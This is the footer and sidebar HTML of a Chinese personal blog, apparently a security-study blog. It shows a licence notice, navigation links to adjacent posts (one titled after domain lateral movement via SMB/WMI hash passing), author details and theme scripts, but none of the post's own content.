    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2023/04/29/%E6%B1%87%E7%BC%96%E8%AF%AD%E8%A8%80/%E6%B1%87%E7%BC%96%E8%AF%AD%E8%A8%80%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" rel="prev" title="汇编语言学习笔记">
      <i class="fa fa-chevron-left"></i> 汇编语言学习笔记
    </a></div>
      <div class="post-nav-item">
    <a href="/2023/05/04/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8%EF%BC%88%E5%86%85%E7%BD%91%E7%AF%87%EF%BC%89/67-%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8-%E5%9F%9F%E6%A8%AA%E5%90%91smb&wmi%E6%98%8E%E6%96%87%E6%88%96hash%E4%BC%A0%E9%80%92/" rel="next" title="67-内网安全-域横向smb&wmi明文或hash传递">
      67-内网安全-域横向smb&wmi明文或hash传递 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="HVVL404"
      src="/images/avatar.png">
  <p class="site-author-name" itemprop="name">HVVL404</p>
  <div class="site-description" itemprop="description">欢迎来到我的博客</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">27</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">9</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/HVVL404" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;HVVL404" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 2023-04 – 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">HVVL404</span>
</div>

<div class="theme-info">
  <div class="powered-by"></div>
  <span class="post-count">博客全站共60.5k字</span>
</div>

        








      </div>
    </footer>
  </div>

  
  
  <script color='0,0,255' opacity='0.5' zIndex='-1' count='99' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
